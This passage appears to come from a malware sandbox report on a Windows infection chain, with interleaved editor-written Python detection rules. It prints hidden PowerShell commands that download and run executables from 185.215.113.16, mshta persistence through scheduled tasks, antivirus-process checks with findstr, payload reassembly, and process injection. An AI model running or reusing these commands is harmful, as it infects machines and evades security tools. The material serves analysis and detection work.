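Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 445000
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 447000
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 455000
""".strip().splitlines()

# Line format as printed by the report: source, operation, target, hex base,
# optional protection (allocations) and optional leading bytes (writes).
LINE_RE = re.compile(
    r"^Source: (?P<src>.+?) Memory (?P<op>allocated|written): (?P<dst>.+?) base: (?P<base>[0-9A-Fa-f]+)"
    r"(?: protect: (?P<protect>.+?))?(?: value starts with: (?P<magic>[0-9A-Fa-f]+))?\s*$"
)

DEFAULT_IMAGE_BASE = 0x400000  # default image base of 32-bit PE executables


@dataclass
class Finding:
    source: str
    target: str
    foreign_image: bool     # target image path differs from the writer's own path
    rwx_alloc: bool         # an execute+write region was allocated in the target
    mz_at_image_base: bool  # "MZ" written at 0x400000
    regions: tuple          # distinct bases written into the target, as ints


def parse(lines):
    return [m.groupdict() for m in (LINE_RE.match(l.strip()) for l in lines) if m]


def assess(lines):
    per_pair = {}
    for ev in parse(lines):
        rec = per_pair.setdefault((ev["src"], ev["dst"]),
                                  {"rwx": False, "mz": False, "mz_base": False, "writes": set()})
        if ev["op"] == "allocated":
            prot = (ev["protect"] or "").lower()
            if "execute" in prot and "write" in prot:
                rec["rwx"] = True
            continue
        base = int(ev["base"], 16)
        rec["writes"].add(base)
        if (ev["magic"] or "").upper().startswith("4D5A"):
            rec["mz"] = True
            if base == DEFAULT_IMAGE_BASE:
                rec["mz_base"] = True
    findings = []
    for (src, dst), rec in per_pair.items():
        if not rec["mz"]:
            continue  # data writes alone are not evidence of a PE being planted
        findings.append(Finding(src, dst, src.lower() != dst.lower(), rec["rwx"],
                                rec["mz_base"], tuple(sorted(rec["writes"]))))
    return sorted(findings, key=lambda f: f.target)


def describe(f):
    if f.foreign_image:
        kind = "PE image written into a different process (process hollowing / PE injection)"
    else:
        kind = "PE image written into a process running the writer's own image (self-spawned child; path equality hides it)"
    return (f"{kind}: {f.source} -> {f.target}; rwx_alloc={f.rwx_alloc} "
            f"mz_at_0x400000={f.mz_at_image_base} regions={len(f.regions)}")


if __name__ == "__main__":
    for finding in assess(REPORT_LINES):
        print(describe(finding))
```

The report lines identify processes by image path only, so two instances of the same executable are indistinguishable; a real telemetry source (PID plus target PID from the NtWriteVirtualMemory call) lets the self-copy case be separated from a process writing into itself.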
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F71201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 8_2_00F71201
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F52BA5 KiUserCallbackDispatcher,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 8_2_00F52BA5
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F7B226 SendInput,keybd_event, 8_2_00F7B226
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F922DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event, 8_2_00F922DA
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe "C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe "C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd" "
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe "C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe "C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe "C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Process created: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe "C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn mS3R9maupm1 /tr "mshta C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE "C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd" any_word
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "j1HKkma32Vn" /tr "mshta \"C:\Temp\v468GkyBl.hta\"" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\v468GkyBl.hta"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn Z94szma4HiI /tr "mshta C:\Users\user\AppData\Local\Temp\wucgjnAiS.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE "C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe Process created: unknown unknown
Source: C:\Windows\System32\wscript.exe Process created: unknown unknown
Source: C:\ProgramData\jhbbvnx\fbpbh.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd" any_word
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe Process created: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe "C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe"
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe Process created: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe "C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe"
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe Process created: unknown unknown
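The process-creation lines above carry the whole delivery chain in plain command lines: mshta runs an .hta that launches a hidden PowerShell WebClient.DownloadFile plus Start-Process against http://185.215.113.16/, schtasks re-runs the same .hta through mshta every 25 minutes, am_no.cmd derives its names from Get-Random output, and Turner.cmd greps tasklist output for security-product processes (opssvc, wrsa, AvastUI, AVGUI, bdservicehost, nsWscSvc, ekrn, SophosHealth) before reassembling the AutoIt host Macromedia.com with copy /b. One detail worth keeping: the first downloader concatenates $env:temp with a file name that has no leading backslash, so the payload lands as C:\Users\user\AppData\Local\TempMHLZ...EXE, beside the Temp folder rather than inside it, which is exactly the path the report records; the second downloader includes the backslash. The following Python is an example added by the editor, not code from the sandbox vendor or from the sample. It encodes these observations as rules over constructed process-creation events whose command lines are copied from this report (plus one benign control); the rule names, the Event/Alert types and the task-name pattern of five random alphanumerics, "ma", four random alphanumerics (inferred from the three task names seen in this report, and an assumption rather than a documented fact) are the editor's own.

```python
import re
from collections import Counter
from dataclasses import dataclass, field


@dataclass
class Event:
    parent: str   # parent image path
    image: str    # created image path
    cmdline: str  # created process command line


@dataclass
class Alert:
    rule: str
    image: str
    detail: dict = field(default_factory=dict)


# Security-product process names taken from the sample's own "tasklist | findstr" checks.
AV_PROCS = {"opssvc", "wrsa", "avastui", "avgui", "bdservicehost",
            "nswscsvc", "ekrn", "sophoshealth"}

DOWNLOAD_RE = re.compile(r"DownloadFile\('(?P<url>https?://[^']+)'", re.I)
DROP_RE = re.compile(r"\$env:temp\+'(?P<tail>[^']+)'", re.I)
TASK_RE = re.compile(r'/tn\s+"?(?P<name>[^\s"]+)"?\s+/tr\s+"(?P<action>.*?)"\s+/sc', re.I)
HTA_RE = re.compile(r'[A-Za-z]:\\[^"]*?\.hta', re.I)
# Assumption inferred from the task names in this report (mS3R9maupm1, j1HKkma32Vn,
# Z94szma4HiI): the 5-char and 4-char Get-Random outputs joined by "ma".
GEN_NAME_RE = re.compile(r"^[0-9A-Za-z]{5}ma[0-9A-Za-z]{4}$")
RANDOM_GEN_RE = re.compile(
    r"-join\s*\(\(48\.\.57\)\s*\+\s*\(65\.\.90\)\s*\+\s*\(97\.\.122\)\s*\|\s*Get-Random", re.I)
COPY_B_RE = re.compile(r"\bcopy\s+/b\s.*\+", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(events):
    """Run every rule over every event and return the alerts in event order."""
    alerts = []
    for ev in events:
        par, img, cl = basename(ev.parent), basename(ev.image), ev.cmdline
        if par == "mshta.exe" and img == "powershell.exe" and "Start-Process" in cl:
            m, d = DOWNLOAD_RE.search(cl), DROP_RE.search(cl)
            if m:
                tail = d.group("tail") if d else ""
                alerts.append(Alert("mshta_powershell_download_execute", ev.image, {
                    "url": m.group("url"), "drop": tail,
                    # no separator after $env:temp -> file lands next to Temp, not in it
                    "outside_temp": bool(tail) and not tail.startswith("\\")}))
        elif img == "schtasks.exe" and "/create" in cl.lower():
            m = TASK_RE.search(cl)
            if m and m.group("action").lstrip().lower().startswith("mshta"):
                h = HTA_RE.search(m.group("action"))
                alerts.append(Alert("schtasks_mshta_persistence", ev.image, {
                    "task": m.group("name"), "hta": h.group(0) if h else None,
                    "generated_name": bool(GEN_NAME_RE.match(m.group("name")))}))
        elif img == "findstr.exe":
            hits = sorted(AV_PROCS & {t.strip('"').lower() for t in cl.split()})
            if hits:
                alerts.append(Alert("av_process_enumeration", ev.image, {"names": hits}))
        elif img == "cmd.exe" and COPY_B_RE.search(cl):
            alerts.append(Alert("copy_b_payload_staging", ev.image, {"cmd": cl}))
        elif img == "powershell.exe" and RANDOM_GEN_RE.search(cl):
            alerts.append(Alert("powershell_random_name", ev.image, {"cmd": cl}))
    return alerts


def summarize(events):
    return Counter(a.rule for a in evaluate(events))


MSHTA = r"C:\Windows\SysWOW64\mshta.exe"
CMD = r"C:\Windows\SysWOW64\cmd.exe"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SCHTASKS = r"C:\Windows\SysWOW64\schtasks.exe"
FINDSTR = r"C:\Windows\SysWOW64\findstr.exe"

# Constructed sample events: command lines copied from this report; the last entry is a
# benign control that must not fire.
EVENTS = [
    Event(MSHTA, PS, r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;'''),
    Event(MSHTA, PS, r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;'''),
    Event(CMD, SCHTASKS, r'''schtasks /create /tn mS3R9maupm1 /tr "mshta C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta" /sc minute /mo 25 /ru "user" /f'''),
    Event(CMD, SCHTASKS, r'''schtasks /create /tn "j1HKkma32Vn" /tr "mshta \"C:\Temp\v468GkyBl.hta\"" /sc minute /mo 25 /ru "user" /f'''),
    Event(CMD, FINDSTR, r'''findstr /I "opssvc wrsa"'''),
    Event(CMD, FINDSTR, r'''findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"'''),
    Event(CMD, FINDSTR, r'''findstr /V "Tunnel" Addresses'''),
    Event(CMD, CMD, r'''cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com'''),
    Event(CMD, PS, r'''powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"'''),
    Event(r"C:\Windows\explorer.exe", PS, r'''powershell -NoProfile -Command Get-Process'''),
]

if __name__ == "__main__":
    for a in evaluate(EVENTS):
        print(a.rule, a.detail)
```

The mshta-to-powershell rule keys on the parent/child pair plus Start-Process rather than on the URL, so it survives a change of C2 host; the findstr rule is the cheapest of the five to run at scale and is also the least specific, since the token set is only what this sample checks for, so treat a hit as a pivot into the parent cmd.exe tree rather than as a verdict.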
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F70B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 8_2_00F70B62
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F71663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 8_2_00F71663
Source: afccf6841f.exe, 00000008.00000002.2268922496.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp, afccf6841f.exe, 0000002F.00000002.2455123932.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: skotes.exe, skotes.exe, 00000006.00000002.2981360890.0000000000AD7000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: rcFProgram Manager
Source: TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE, TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE, 00000017.00000002.2447754863.000000000082D000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Program Manager
Source: afccf6841f.exe Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_008FD3E2 cpuid 6_2_008FD3E2
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075512001\5d2afc26b8.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075512001\5d2afc26b8.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075513001\9228e21255.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075513001\9228e21255.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075514001\d895046020.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075514001\d895046020.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075515001\k6Sly2p.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075515001\k6Sly2p.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075516001\L5shRfh.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075516001\L5shRfh.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075517001\7fOMOTQ.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075517001\7fOMOTQ.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075518001\r7MRNUY.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075518001\r7MRNUY.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
